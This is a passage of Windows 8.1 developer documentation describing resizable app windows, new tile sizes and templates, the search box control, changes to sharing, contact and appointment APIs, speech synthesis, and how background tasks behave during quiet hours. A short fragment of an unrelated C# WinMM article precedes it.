// now forwarded to base.WndProc for processing
base.WndProc(ref m);
}
During Form1_Load, an MM.CheckMixer() function, which I don’t show here, attempts to open, then close, the default mixer and failure aborts the load.
MM.CheckMixer()
The MM.MonitorControl( iw ) function sets up a reporting mechanism for the message we are wanting to intercept. The CALLBACK_WINDOW and iw parameters set up the NativeWindow w to receive the message of interest.
MM.MonitorControl( iw )
CALLBACK_WINDOW
iw
w
The reader will appreciate that if you were setting out to build a stand alone utility with the same functionality as the System Volume utility, you would of course do much more than this. You would first determine what the range of input and output capabilities of your sound card are and your coding would be consistent with what you found and what you wanted to include.
Here I am only concerned with illustrating how to use the WinMM functions and how to achieve synchronization.
I know from when I was researching this small project, and particularly from questions being raised on the forums, that there is a lot of uncertainty out there as to how the WinMM.DLL is used, and I hope I have been able to remove some of the mystery and encourage readers to use these functions with confidence.
I recommend the following reading for anyone newly interested in this topic. The first reference is a lengthy but definitive dissertation on mixers and their controls and deserves to be read carefully. The list is but a small sample of what is. | http://www.codeproject.com/Articles/22953/A-Synchronized-Volume-Control-for-your-Application?fid=978832&df=90&mpp=25&sort=Position&spc=Compact&tid=2392739 | CC-MAIN-2015-27 | refinedweb | 2,112 | 60.95 |
Hi,
I need to write a program that will run on a intel atom d525 processor with windows xp installed. I am using Parallel Studio 2013 with Visual Studio 2012.
When I tried running my code on the machine with windows XP I got the following error:
... is not a valid win32 application.
After some initial research I found out that this was because the console application compiled with Visual C++ uses windows APIs that are not available in windows XP and it has provided a special compiler with which you can compile code that is compatible for windows XP.
This is all very well, and I got this to work. The problem is that I need to highly optimise the code, and I was planning on using the intel C++ compiler to do this. However I have not found a way to compile code with the Intel C++ compiler that is compatible on windows XP.
I tried using
#include <WinSDKVer.h>
#define _WIN32_WINNT 0x0502
but maybe I did something wrong, because that did not seem to do anything.
I do not necessaraly need to use a console application, just some way to start the program in windows XP.
Kind regards,
Edwin | https://software.intel.com/en-us/forums/intel-c-compiler/topic/381108 | CC-MAIN-2015-48 | refinedweb | 202 | 71.34 |
/* ** (c) COPYRIGHT MIT 1995. ** Please first read the full copyright statement in the file COPYRIGH. */
This module provides some "make life easier" functions in order to get the application going. The functionality of this module was originally in HTAccess, but now it has been moved here as a part of the application interface where the application may use it if desired.
This module is implemented by HTHome.c, and it is a part of the W3C Sample Code Library.
#ifndef HTHOME_H #define HTHOME_H #include "WWWLib.h"
The home page is special in that this is is the first page to visit when a client application starts up. Note that a home page is a generic URL and hence can be any resouce - not only resources on the local file system.
#define LOGICAL_DEFAULT "WWW_HOME" /* Defined to be the home page */ #ifndef PERSONAL_DEFAULT #define PERSONAL_DEFAULT "WWW/default.html" /* in home directory */ #endif /* If the home page isn't found, use this file: */ #ifndef LAST_RESORT #define LAST_RESORT "" #endif
Some Web applications can also be run remotely - for example as a telnet login shell. The Line Mode Browser is an example of such an application. In that case, the home page is often more generic than a personal home page.
/* If one telnets to an access point it will look in this file for home page */ #ifndef REMOTE_POINTER #define REMOTE_POINTER "/etc/www-remote.url" /* can't be file */ #endif /* and if that fails it will use this. */ #ifndef REMOTE_ADDRESS #define REMOTE_ADDRESS "" /* can't be file */ #endif #ifndef LOCAL_DEFAULT_FILE #define LOCAL_DEFAULT_FILE "/usr/local/lib/WWW/default.html" #endif
Getting an anchor for the home page involves looking for the (environment) variables described in the section above. As this is something that almost all client applications must do then we provide some simple methods that do the work for you.
extern HTParentAnchor * HTHomeAnchor (void);
When the user starts writing a new document, the client application should create a new anchor which can contain the document while it is created. This can also be the location for backups and for security "auto-save" functionality. This functions creates a new anchor with a URL pointing to the temporary location defined by this user profile and returns that anchor. Andy Levine: I additionally found that calling HTTmpAnchor repeatedly without freeing the newly allocated anchor will cause the anchor hash table to continue to grow.
extern HTParentAnchor * HTTmpAnchor (HTUserProfile * up);
Creates a local file URL that can be used as a relative name when calling expanding other URLs relative to the current location in the local file system tree where the application is running. The code for this routine originates from the Line Mode Browser and was moved here by howcome@w3.org in order for all clients to take advantage.
#define HTFindRelatedName HTGetCurrentDirectoryURL extern char * HTGetCurrentDirectoryURL (void);
Takes a string of the form "
a=b" containing HTML form data,
escapes it accordingly and puts it into the association list so that it readily
can be passed to any of the HTAccess function that handles HTML form data.
The string should not be encoded in any way - this function encodes it according
to the HTML form encoding rules.
Examples are "foo=bar", "baz=foo and bar", "a= b ", " a = b ", "toto=", "four = two + two", "six three + three", and "a=b=c"
extern BOOL HTParseFormInput (HTAssocList * list, const char * str);
Standard interface to libwww TRACE messages. Pass this function a string of characters. It will set up the appropriate TRACE flags. The following characters are used as follows:
The string must be null terminated, an example is "sop".
extern int HTSetTraceMessageMask (const char * shortnames);
#endif /* HTHOME_H */ | http://www.w3.org/Library/src/HTHome.html | CC-MAIN-2015-18 | refinedweb | 605 | 53 |
How to use QList<*> * object with [] operator ?
QList allows the object to be used just like standard arrays where you access the items through the [ ] operator. I have been able to use this feature when I had an object like QList<pToObject *> myList. But instead, when I have a pointer to such a QList I can't seem to get it done.
Consider the next code:
@#include <QApplication>
#include <QList>
struct test{
int a;
int b;
};
int main(int argc, char *argv[]){
QApplication app(argc, argv);
// QList<pToObject * > * pToMyList;
QList<test *> * values;
for (int i=0; i<5; i++){
test * ps = new test;
ps->a = i;
ps->b = i+1;
values->append(ps);
}
qDebug("%d", values[2]->a);
return app.exec();
}@
When I run the code above I run into:
@main.cpp 21: error: base operand of '->' has non-pointer type 'QList<test*>'@
I don't get how should I use the [ ] operator when dealing with a pointer. Dereferencing the object ( *values[ 2 ]->a ) throws an error as well.
Could someone please show me the way?
p.s. I know I could use QList.at() but this doesn't allow me to write on the object. QList.takeAt() is not usable since it detaches the item from the QList, while instead I need to make changes but still leave the object in the QList.
You should use
@(*values)[2]->a@
or
[object Object]s->operator->a@
but first notice that in your code the values pointer is never initialized.
Hope it helps,
H.
Hi,
[quote]when I have a pointer to such a QList I can’t seem to get it done.[/quote]That's because [] performs arithmetic on pointers.
@
// Initialize a char pointer:
char* string = ...
char c;
// The following two lines are equivalent:
c = string[5];
c = *(string+5);
@
So, in your code,
[object Object]s[2]@
is like calling
@*(values+2)@
What is your goal for using a pointer?
To Arnaut: my mistake, I forgot the initialization part which I have corrected while writing this post (but I didn't update the post... :D). Anyway, thank you very much, that works just fine!
To: JKSH: my goal is to store many struct pointers in a class. so basically I need a QList pointer in my class header before I can use it:
@ struct Obj{ ... };
class myclass{
...
private:
QList<Obj * > * pMyList;
}@
During execution I load objects in pMyList using append(). But I often need to modify the values inside the saved structs, so I can't use at() and takeAt() for the reasons explained before.
Do you think there is a better alternative than Arnaut's one?
- SGaist Lifetime Qt Champion
Hi,
What JKSH meant is why is pMyList a pointer ? There's no need for that, just use
@QList<Obj *> myList;@
I'm trying to prevent stack overflow problems since I know the QList is going to be pretty heavy... although, I read now in the docs that QList stores items as pointers to data so it wouldn't be such a big issue...
[quote author="T3STY" date="1392118794"]I'm trying to prevent stack overflow problems since I know the QList is going to be pretty heavy... although, I read now in the docs that QList stores items as pointers to data so it wouldn't be such a big issue...[/quote]All of Qt's containers (QList, QString, QMap, etc.) take up a very tiny amount of stack space. All of their data are stored on the heap.
Like SGaist said, there is no need to use pointers to QLists.
Some people use pointers to -share a list between two objects- avoid copying data when letting two objects read the same list. This is not required (and should be avoided), because copying a QList is very cheap too. The data is "implicitly shared": . Anyway, const references should be used for this purpose.
[quote author="JKSH" date="1392119103"]Some people use pointers to share a list between two objects. This is not required (and should be avoided), because copying a QList is very cheap too. The data is "implicitly shared":[/quote]
One should be aware though that copy-on-write will make these independent objects as soon as you modify one of the lists, at which point the two lists will be distinct and different. This is a fundamental difference to using pointers to a shared list.
Thank you for the advice, JKSH. You're right, I don't really need pointers there. Also, thank you mmoll for pointing out the behaviour when copying :-)
Thanks mmol. I shouldn't have said "share" -- I meant "avoid copying data" | https://forum.qt.io/topic/37583/how-to-use-qlist-object-with-operator/3 | CC-MAIN-2019-04 | refinedweb | 770 | 72.87 |
Paul Prescod writes: > Well, why use numbers? The numbers are meaningless. Strings are at least > meaningful for some percentage of the world. Paul, If they are identifiers, they are meaningless regardless. They can only be used as messages if they are natural language, which doesn't appeal to me. As long as they're identifiers, I think it's fine for them to be strings; I really am not *advocating* the use of numbers. I do think that API changes to a known-working module need to be justified in some way. > They are both messages and identifiers. As you can see above they can be > used as "dumb" identifiers (just like the integers) and they can be used > as strings if you happen to want to output English error messages (which > will be the case in the vast majority of situations just because most > programmers are too lazy/busy to localize). What I'm disturbed by is the conflation of use. I'd rather see some identifier be used and let the user take care of *all* messages provided to the user. A "default" set of English messages can (and should) be provided, but it's better to ask the client code to perform some transformation (dictionary lookup, whatever the guise); this allows better flexibility both for application writers and for future maintainers of the pyexpat module. > On second thought, instead of a dictionary I'll use an instance so that > you can say > > if rv == errors.XML_ERROR_SYNTAX: > ... That's a bit nicer. I'm not sure that the namespace needs to be separated from the module namespace, but I don't object, either. -Fred -- Fred L. Drake, Jr. <fdrake at acm.org> Corporation for National Research Initiatives | https://mail.python.org/pipermail/xml-sig/2000-February/001885.html | CC-MAIN-2014-15 | refinedweb | 289 | 64.41 |
I’ve visited the Collatz conjecture a couple of times before. I’ve played with the problem a bit more to understand how attractors work in the Collatz problem.
So what is the Collatz conjecture? The conjecture is that the function
Always reaches one. But the catch is, nobody actually figured out how to prove this. It seems to be true, since for all the
ever tried the function eventually reached 1. While it is very difficult to show that it reaches 1 every time, it’s been observed that there are chains, let’s call them attractors, such what when you reach a number within that chain, you go quickly to 1. One special case is the powers-of-two attractor: whenever you reach a power of two, it’s a downward spiral to 1. Can we somehow use this to speed up tests?
The first thing is to see how long the power-of-two chains are. A quick Mathematica program reveals, from the 100M first numbers, the following histogram:
So basically the attractor always reach 16 first, then 1024, then 256. Of course, if it reaches 16384 first, it will run though all the powers of two until 1 is reached, but what’s interesting is that it reached 16384 first. Or 16. Especially 16, in fact.
Would prune the search whenever a power of two is reached give a speed-up?
So before we start we need an efficient method of testing whether or not a number is a power of two. Fortunately, it’s not much harder than checking if a number is even:
bool is_even(unsigned x) { return (x&1)==0; } bool is_power2(unsigned x) { return (x&(x-1))==0; }
A naïve, non-instrumented, version of the Collatz function could look something like:
unsigned collatz(unsigned x) { if (x==1) return 1; else if (is_even(x)) return collatz(x/2); else return collatz(3*x+1); }
This version implements directly the equation above. Using the idea of pruning whenever a power of two is reached would yield the following implementation:
unsigned collatz_prune(unsigned x) { if (x==1) return 1; // done if (is_even(x)) if (is_power2(x)) return 1; // done, attractor else return collatz_prune(x/2); else return collatz_prune(3*x+1); }
But testing for a power-of-two looks expensive. Couldn’t we just prune the recursion when 16 is reached? 16 is a good choice if we look at the histogram from our previous experiment.
unsigned collatz_prune_16(unsigned x) { if ((x==1) || (x==16)) return 1; // done, attractor 16 if (is_even(x)) return collatz_prune_16(x/2); else return collatz_prune_16(3*x+1); }
But we also observed in a previous post that an odd number would be transformed into an even number (that’s what
will do) to be be divided again! So we can “compress” the sequence by computing
as the next step, compressing two calls into one.
unsigned collatz_prune_compressed(unsigned x) { if (x==1) return 1; // done if (is_even(x)) if (is_power2(x)) return 1; // done, attractor else return collatz_prune_compressed(x/2); else return collatz_prune_compressed((3*x+1)/2); } unsigned collatz_prune_16_compressed(unsigned x) { if ((x==1) || (x==16)) return 1; // done, attractor 16 if (is_even(x)) return collatz_prune_16_compressed(x/2); else return collatz_prune_16_compressed((3*x+1)/2); }
*
* *
So, let’s what works, and what doesn’t. Gluing everything together lets us gather timings and speed-ups. For the 100M first numbers:
So checking for all powers of two gives a better speed-up than only checking against 16, which is surprising. Why? Well, 16 makes up the vast majority of the first power of two reached by the recursion, and testing against a constant should be faster than computing (x&(x-1))==0. But that’s not the case. This means that others powers of two count for a lot more than first thought (a “fat tail” of sorts) and offset the cost of testing power-of-twoness.
However, “compressing” the recurrence seems to jump over one power of two once in a while and somewhat reduce the speed-up. However, “compressing” the recurrence works well with just checking against 16, because now the fat tail is offset. That’s unexpected.
*
* *
This, of course, doesn’t shed much light on how to solve the Collatz conjecture, but tells us that sometimes even a cursory examination of the behavior of a function can lead to an understanding that allows us to modify the function to gain a speed-up. Here, the speed-up is not that impressive, about 30%, not four-fold, but is a speed-up nonetheless.
Quick question: does your compiler perform tail-optimisation, effectively transforming recursion into a loop? If not then you’ve got a bit performance gain in doing so.
I don’t think it does, except maybe for the very simplest cases. Recursion and tail-recursion are not a primary design pattern in languages like C and C++. It’d be great if they did. This being said, I should investigate that.
After investigation, G++ does something, but that’s not quite tail-recursion elimination. It generates code that just calls back the function, but instead of actually call it (and implement recursion), it generates a hard jump to the begining of the function. I guess it figured out that there is only the argument as variable and can afford that optimization
A more common way to optimize the calculation by using known results is building a table for many results and use them for small numbers.
Splitting a number into a low bits and a high bits part, the low bits may be used to access a table of bits -> { i, f, d } with i = number of iterations, f = factor, d = difference. The result of collatz( h*2^n + l ) = i + collatz( h*f + d ); with collatz(x) returning the number of iterations. Doing this n iteration steps can done in one single step. Best results on my system are n = 16 for calculating collatz(x) up to x = 4*10^9 with a perl implementation.
(I took the liberty of editing your post to include sourcecode language=”perl” so that your code would display correctly)
What is the magnitude of the speed up compared to a naïve implementation? | https://hbfs.wordpress.com/2014/10/07/pruning-collatz-somewhatz/ | CC-MAIN-2017-26 | refinedweb | 1,043 | 58.72 |
Closed Bug 1287622 Opened 6 years ago Closed 6 years ago
Remove Cortana-related code from mozilla-central
Categories
(Firefox :: Search, defect, P4)
Tracking
()
Firefox 52
People
(Reporter: jaws, Assigned: u579587, Mentored)
References
(Blocks 1 open bug)
Details
(Whiteboard: [good first bug][lang=js])
Attachments
(1 file, 3 obsolete files)
Due to bug 1286832, Cortana search no longer works in Firefox. We should remove the code from the tree since it's dead.
(To expand a bit, lest other bugs start getting duped to this one...) Microsoft made a change to Windows 10 so that Cortana is now hard-coded to open search results only in Edge, and only with Bing. Previously, they respected your default browser choice, so that Firefox (or whatever your default was) would be launched, which could then use your default search engine. So this isn't a bug in Firefox, it's that Windows 10 will no longer send requests to Firefox in the first place.
See also:
I believe Microsoft rolled out this change with the recent Anniversary Update of Windows 10.
Priority: -- → P4
can we make this a mentored bug? Code removal sounds like something a contributor can easily handle.
Flags: needinfo?(jaws)
Good call, yes we can. I'll mentor it. To fix this bug, we'll want to undo the changes from,, and
Mentor: jaws
Flags: needinfo?(jaws)
Whiteboard: [good first bug][lang=js]
Hi! I'm at a Mozilla event looking for a first bug. I've a working build, yey :) Can I work on this? Thanks a bunch!
Yes, you may work on this. I will wait until you attach a patch before assigning the bug.
Assignee: nobody → bugzilla
Status: NEW → ASSIGNED
Thanks Jared! I'm winging this a lot. Can you check the patch?
Flags: needinfo?(jaws)
Comment on attachment 8791737 [details] [diff] [review] Remove Cortana-related code from Firefox Search, as it no longer works in Firefox after Microsoft hard-coded search results to Edge Review of attachment 8791737 [details] [diff] [review]: ----------------------------------------------------------------- Looks good! Can you update the commit message to the following? "Bug 1287622 - Remove Cortana-related code from Firefox as it no longer works after Microsoft hard-coded search results to Edge." ::: browser/app/profile/firefox.js @@ -1517,4 @@ > pref("browser.crashReports.unsubmittedCheck.enabled", true); > #endif > > -pref("browser.crashReports.unsubmittedCheck.autoSubmit", false); \ No newline at end of file It looks like your patch added an extra newline at the end of this file.
Attachment #8791737 - Flags: review+
Flags: needinfo?(jaws)
Hey Jared! I'm a tad confused. We should have newlines at EOFs? Or did I add yet another? Because I can only the see the normal 1 newline at EOF. Sorry for being a newbie. Also, I'm used to git, so basically I'm stuck trying to squash 2 commits and exporting a new patch.. Squashing commits will work until you get a better hang of how to use Mercurial. I'll fix up the previous version of the patch and get it landed for you. I'll also see if I can find another bug for you to work on. ::: browser/app/profile/firefox.js @@ -18,5 @@ > -#ifdef XP_UNIX > -#ifndef XP_MACOSX > -#define UNIX_BUT_NOT_MAC > -#endif > -#endif These lines shouldn't be removed. The previous patch removed the "browser.search.redirectWindowsSearch" preference, which was correct.
Attachment #8791961 - Flags: review?(jaws) → review-
(In reply to Jared Wein [:jaws] (please needinfo? me) from comment #14) >. I was wrong here, it looks like it didn't have a newline at the end of the file. I'm sorry for misleading you, your original change was fine.
Attachment #8791737 - Attachment is obsolete: true
Attachment #8791961 - Attachment is obsolete: true
Attachment #8792507 - Flags: review+!
(In reply to Jared Wein [:jaws] (please needinfo? me) from comment #17) >! Thanks a million Jared! I'm now working with gecko-dev from GitHub + exporting the patch with git. It's a more comfortable setup for now. Thanks for your mentoring!
Pushed by ryanvm@gmail.com: Remove Cortana-related code from Firefox as it no longer works after Microsoft hard-coded search results to Edge. r=jaws
Status: ASSIGNED → RESOLVED
Closed: 6 years ago
status-firefox52: --- → fixed
Resolution: --- → FIXED
Target Milestone: --- → Firefox 52 | https://bugzilla.mozilla.org/show_bug.cgi?id=1287622 | CC-MAIN-2022-27 | refinedweb | 699 | 68.36 |
UX/UI
Resizable windows give users more control over how they use your app. New features let you do more with your app’s tile. And updates to search, share, and charms create a more consistent general experience for users.
New or updated in Windows 8.1
- Resizable windows
- Tile updates
- Search updates
- Share updates
- Charms work on every screen
- Integrate with people and events
- Speech synthesis
- Updates to background task management
- Alarm app support on the lock screen
- Updates to work-item scheduling
Resizable windows
[Get the Application views, Multiple views, and Projection manager samples now.]
Windows 8.1 brings several changes to window size and position. As you develop apps for Windows 8.1, here are the main points to keep in mind:.
Apps must fill the height of the screen, just like in Windows 8. The minimum height of an app is 768 pixels.
Design guidelines for resizable windows
When you design an app for Windows 8.1, you have to:
Make sure your app layout and controls scale down to the minimum size. In particular, think about how your app's size impacts these controls:
Design your app to use the space on a large screen effectively, and with a layout that reflows automatically. Don't leave large empty spaces.
If you change the minimum width to 320 pixels, have your app adjust in these ways when its width is narrow (that is, between 320 and 500 pixels wide):
- Use a vertical view.
- Use the smaller back-button style. For more info about back-button sizes, see the Symbol icon list.
- Make the left margin 20 pixels wide.
- Use the 20-point size for the app's header text.
- Use the smaller offset values for page transition animations and content transition animations.
Additional layout samples are available for windows that resize to 320 pixel width and windows that are taller than wide. For more info about using the charms for an app regardless of the app's size, see Charms work on every screen.
Setting the minimum width
If you want to change the minimum width of an app from the default of 500 pixels, you specify the MinWidth attribute of the ApplicationView element in the app manifest.
For more info about the app manifest, see App package manifest.
Updates to the ApplicationView class
In Windows 8.1, the Windows.UI.ViewManagement namespace has these new enumerations:
And the ApplicationView class has these new properties:
ApplicationView also has these new methods:
In Windows 8.1, these members are deprecated:
ApplicationView.Value property—Not valid because apps no longer have fixed-width view states. Instead, you can use the Orientation property to get the orientation of the app window, and the AdjacentToLeftDisplayEdge, AdjacentToRightDisplayEdge, and IsFullScreen properties to get the position of the app.
ApplicationView.TryUnsnap method—Not valid because apps no longer have a specific snapped state, and because the default minimum width is 500 pixels.
ApplicationViewState enumeration—Not valid because apps can be resized continuously and no longer have fixed-width view states.
Tile updates
[Get the App tiles and badges and Secondary tiles samples now.]
Windows 8.1 introduces these changes to tiles and the ways you work with them.
New tile sizes.
A user can fit four small tiles in the place of one medium tile. Small tiles do not support live tile notifications, but they do support badges. A large tile takes the same amount of space as two wide tiles, and supports live tile notifications just like the Windows 8 tile sizes.
New naming conventions for tile templates
With the addition of the new tile sizes, we've updated the Windows 8 naming convention for tile templates. The new convention uses absolute pixel sizes at the 1× scaling plateau. The four tile sizes are mapped to the new names as follows, with many templates in each category:
- Small = Square70x70
- Medium = Square150x150
- Wide = Wide310x150
- Large = Square310x310
Similarly, the SmallLogo attribute is now called the Square30x30Logo in the app manifest.
Under the new naming conventions, all of the existing tile templates have been renamed.
For compatibility, the older names are still recognized. But use the new names in any new development you do.
Tile-related changes in the app manifest
You declare the default properties of your primary app tile—the sizes it supports, the display name, and the tile color—in the app manifest.
Opting in to new tile sizes
In Windows 8, you opted in to supporting a wide tile for your app by specifying a wide tile asset in the app manifest. In Windows 8.1, you opt in to supporting a large (Square310x310) tile by specifying a large tile asset in the manifest.
All apps support medium (Square150x150) and small (Square70x70) tiles. Again, you can provide small tile assets in the manifest. If your app does not provide a small tile image, either by doing its own scaling work or by providing a separate asset, Windows 8.1 automatically scales down your medium tile image.
As in Windows 8, we recommend that, for each tile size you support, you supply separate assets for each of the four scaling plateaus (0.8x, 1x, 1.4x, and 1.8x). This ensures that your tiles always appear crisp and without any scaling artifacts. Also, for better accessibility support, you can provide image assets for the high-contrast theme.
Displaying the app name for different tile sizes
In Windows 8, you used the app manifest to specify which tile sizes displayed your app's name. You still do this in Windows 8.1, but there's a new formatfor it. And note that you can't show the app name on the small (Square70x70) tile size.
Declaring a default pinning size
In Windows 8, if an app supported a wide tile, it was pinned to Start as a wide tile; otherwise, it was pinned as a medium tile. In Windows 8.1, you can optionally override this and declare either the medium or wide tile (but not the small or large tile) to be the default pinning size. But don't forget that, in Windows 8.1, your app is not automatically pinned to Start on installation. It appears in the All Apps view, and from there the user must explicitly choose to pin your app to Start.
Changes to the app manifest schema
Now you specify an additional namespace, "", in your manifest, to include the schema elements that declare the new functionality we've been talking about. The following example shows you some of the new and renamed attributes that you'll see in your manifest. Note the large tile asset included under the DefaultTile element, which also explicitly declares a preferred default size. The app also opts to show its app name on only the medium and wide tiles and not the large tile.
<Package xmlns="" xmlns: ... <wb:VisualElements <wb:DefaultTile <wb:ShowNameOnTiles> <wb:ShowOn <wb:ShowOn </wb:ShowNameOnTiles> </wb:DefaultTile> <wb:LockScreen <wb:SplashScreen </wb:VisualElements>
Changes to tile notifications
When you send a tile notification, remember that your app could receive the notification while running on either Windows 8.1 or Windows 8. Because the new names for existing templates are recognized only by Windows 8.1, the schema has added a fallback attribute. By including the fallback attribute, your notification payload can specify a Windows 8.1 template along with a Windows 8 template, in case the notification is received on a Windows 8 system. To use the new template names and the fallback attribute, include the new version attribute, set to a value of 2, in the visual element as shown here.
<tile> <visual version="2"> <binding template="TileSquare150x150Image" fallback="TileSquareImage" branding="None"> <image id="1" src="Assets/Images/w6.png"/> </binding> <binding template="TileWide310x150Image" fallback="TileWideImage" branding="None"> <image id="1" src="Assets/Images/sq5.png"/> </binding> <binding template="TileSquare310x310Image" branding="None"> <image id="1" src="Assets/Images/sq6.png"/> </binding> </visual> </tile>
Note that you can't use the fallback attribute with large tiles because they didn't exist in Windows 8.Windows 8 notifications work just fine on Windows 8.1 without any alteration, but they aren't able to use the large tile size.
Specifying tile sizes for the notification queue
In Windows 8, when you enabled the notification queue, it was enabled for both medium and wide tiles. Windows 8.1 adds methods to the TileUpdater class that let you enable the notification queue for specific tile sizes.
New tile sizes and alternate logos in secondary tiles
In Windows 8.1, the flyout that users see when they pin content as a secondary tile allows them to page through and choose from all of the secondary tile's available sizes and looks. The secondary tile can support any tile size that is supported by its app tile. If you don't specify a specific small tile image for the secondary tile, Windows 8.1 scales down the square tile image and uses that.
In addition to the default secondary tile image, you can provide up to three alternate versions for each tile size, for a possible maximum of 12 versions. You can also specify, using the AlternateVisualElements method, an alternate small logo for each of the three tile sizes (square, wide, large) that support logos.
More accurate phonetic-string support for ordering secondary tiles
In certain character-based languages such as Japanese, the sort order in the UI is based on a phonetic spelling of the characters that make up the app's display name. This phonetic spelling is a separate string from the display name. When pinning a secondary tile, users can specify a display name for that tile in the pinning flyout but they cannot specify a phonetic spelling. Windows makes a guess as to the phonetic string, but it's not always right.
Apps sometimes know the right phonetic string, though, because the user has defined it through a custom control that the app provides. In Windows 8.1, an app can then pass that string to Windows through the new SecondaryTile.PhoneticName property. Note that this phonetic name string is tied to the default display name associated with the secondary tile. So if the user changes the display name through the pinning flyout, the system's guess for the phonetic spelling is used instead.
Search updates
[Get the SearchBox control sample now.].
The search box layout looks like this.
Here are example search results displayed in the search box control.
The search box control supports input method editor (IME) integration.
Suggestions are updated as the user types each letter with an IME. Suggestions include ideographic Chinese characters based on partial phonetic input. The IME Candidate UI doesn't obscure the search suggestions flyout. The search box supports using keyboard input to navigate the text box, the IME candidate list, and the search suggestions.
Share updates
[Get the Sharing content source and Sharing content target samples now.]
Windows 8.1 brings these changes to the sharing experience and the way you use the Share contract in your apps.
Adding new data formats to DataPackage.
WebLink is shared when the user has selected nothing, so the source app is sharing an implicit selection of the displayed content. By populating this format, the source app shares the content of the current page as a Uniform Resource Identifier (URI). The shared link references the webpage that the user is viewing, so this format always begins with http or https.
ApplicationLink is also shared when the user has selected nothing, so again the source app is sharing an implicit selection of the displayed content. By populating this format, the source app shares the content of the current page as a URI. The shared URI has a scheme that's handled by the source app. When the source app is activated with this URI protocol, it displays the same content they are currently viewing. This format represents the shared content by providing a way to return to the content by using an app protocol.
The WebLink and ApplicationLink formats are not exclusive. WebLink links to the content on the web and ApplicationLink links to the content in an app. For example, a news reader app may have content in both forms, with a URI to bring the user back to the article in the app or to bring the user to the same article on a web site. The target app chooses how to handle the URI. For example, the Mail app might use the WebLink format, because the link can be sent to the Internet and consumed from a non-Windows system. But the reader app might use the ApplicationLink format, so it reactivates the source app and brings the user back to the original content.
ContentSourceWebLink is a companion property that you use to attribute the shared content. It's shared when the app provides a web link to the content that's being shared. When the user makes an explicit selection, the WebLink format isn't populated because the value for the WebLink format isn't the same as the user’s selection. Populating this info doesn't mean that the web page is the user's selection; it just means that the content comes from there.
ContentSourceApplicationLink is the second companion property that you use to attribute the shared content. It's shared when the app finds it meaningful for the user to return to the content that's currently displayed in the app. When the user makes a selection, the ApplicationLink format isn't populated because the value for the ApplicationLink format in this case isn't the same as the user's selection. Populating this info doesn't mean that the deep link into the app represents the user's selection; it just means that the content comes from there.
For example, a user is in a reader app looking at an article. The user selects a quotation and shares it to OneNote. To attribute the quotation to the article, the reader app doesn't use the WebLink or ApplicationLink format, because the article isn't equivalent to the quotation being shared. So instead, the app uses the ContentSourceWebLink and ContentSourceApplicationLink properties. OneNote adds the selected text along with the source attribution. Later in OneNote, the user can read the quote and can get back to the reader app or web page to read the surrounding context of the quote.
Improving share responsiveness
In Windows 8.1, your apps that use the Share contract can improve responsiveness by dismissing the share pane programmatically.
Call the new DismissUI method to close the Share pane. Calling DismissUI is similar to the user dismissing the Share pane by tapping outside it. If the share operation takes a long time, the app continues to run. If the operation isn't long-running, it has 10 seconds to run before being terminated.
The target app can't currently move itself off the screen. So when a share operation starts, the app typically shows a progress indicator and has the user wait until the operation is complete (even though no more user interaction is necessary to complete the operation). Although it's actually safe for the user to dismiss the flyout with a light tap, users tend to think that dismissal before the share operation is complete could cause a loss of data, and so they're not inclined to do so. DismissUI lets your app dismiss the flyout automatically.
Package family name
In Windows 8.1, source apps for the Share contract can provide a Package Family Name to target apps, so that target apps can provide a fallback experience when launching the app specified by ApplicationLink.
The Package Family Name is the unique identifier of an app package. When a source app gives this identifier to the target app, the target app can provide a fallback experience by calling the LaunchUriAsync method with the provided ApplicationLink. If the URI’s scheme is not handled, for example, because the user uninstalled the app, or if the URI is roamed to another device that doesn't have the app installed, a dialog box tells the user to look for an app in the Windows Store. The user is taken to the Store by default, but not to the required app. If you include the Package Family Name in the LauncherOptions object that is passed to LaunchUriAsync, the user is prompted about the specific app to install and is taken to that app's listing page in the Store.
Uri format has been deprecated
As was mentioned earlier,. The Uri format remains as an alias for the WebLink format..
Build apps that integrate with people and events
[Get the Contact manager API, Appointments API, and Handling Contact Actions samples now.].
Use these new APIs to enable your app to view people contact cards and manage events from your app:
- ShowContactCard method
Enables apps to query the operating system for a user’s contact and show user’s contact data in a contact card.
- AppointmentsProvider namespace
Supports add appointment, replace appointment, and remove appointment requests through activations that an appointments provider interacts with.
- AppointmentManager class
Enables apps to interact with the user’s appointments provider to add, replace, and remove events. Also, shows the primary UI for the appointments provider.
- Activation namespace
Enables an app to handle the activation parameters for the new appointments provider and contact contracts, supported by Windows.
Speech synthesis
[Get the Speech synthesis sample now.].
Generating speech from plain text
This example shows how a Windows Store app uses a SpeechSynthesizer object to create an audio stream and then generate speech based on a plain text string.
// The object for controlling and playing audio. var audio = new Audio(); // The object for controlling the speech-synthesis engine (voice). var synth = new Windows.Media.SpeechSynthesis.SpeechSynthesizer(); // Generate the audio stream from plain text. synth.synthesizeTextToStreamAsync("hello World").then(function (markersStream) { // Convert the stream to a URL Blob. var blob = MSApp.createBlobFromRandomAccessStream(markersStream.ContentType, markersStream); // Send the Blob to the audio object. audio.src = URL.createObjectURL(blob, { oneTimeOnly: true }); audio.play(); });
Generating speech output from Speech Synthesis Markup Language (SSML)
The next example shows how a Windows Store app uses a SpeechSynthesizer object to create an audio stream and then generate speech based on an SSML text string.
// The string to speak with SSML customizations. var" + "Hello <prosody contour='(0%,+80Hz) (10%,+80%) (40%,+80Hz)'>World</prosody> " + "<break time='500ms' />" + "Goodbye <prosody rate='slow' contour='(0%,+20Hz) (10%,+30%) (40%,+10Hz)'>World</prosody>" + "</speak>"; // The object for controlling and playing audio. var audio = new Audio(); // The object for controlling the speech-synthesis engine (voice). var synth = new Windows.Media.SpeechSynthesis.SpeechSynthesizer(); // Generate the audio stream from SSML. synth.synthesizeSsmlToStreamAsync(Ssml).then(function(synthesisStream){ // Convert the stream to a URL Blob. var blob = MSApp.createBlobFromRandomAccessStream(synthesisStream.ContentType, synthesisStream); // Send the Blob to the audio object. audio.src = URL.createObjectURL(blob, { oneTimeOnly: true }); audio.play(); });
Updates to background task management
[Get the Background task sample now.]
Windows 8.1 adds several new features for background tasks:
Quiet hours and background tasks
Quiet hours is a new feature in Windows 8.1 which allows the user to designate specific hours of the day when they don't want to be disturbed with notifications. This feature also stops most of the background activity associated with Windows Store apps, preventing disturbance of the user and potentially extending the connected standby lifetime of the device.
When the system enters quiet hours, background tasks are queued and held until the end of quiet hours. Currently running background tasks will be canceled when the system enters quiet hours.
At the end of quiet hours, background tasks are allowed to start back up. Each background task begins again at a random interval before the system exits quiet hours. This ensures that background tasks don’t all wake up at the same time, which would put an unnecessary load on system resources and remote server resources. The system will not trigger notifications until the designated quiet hours exit time.
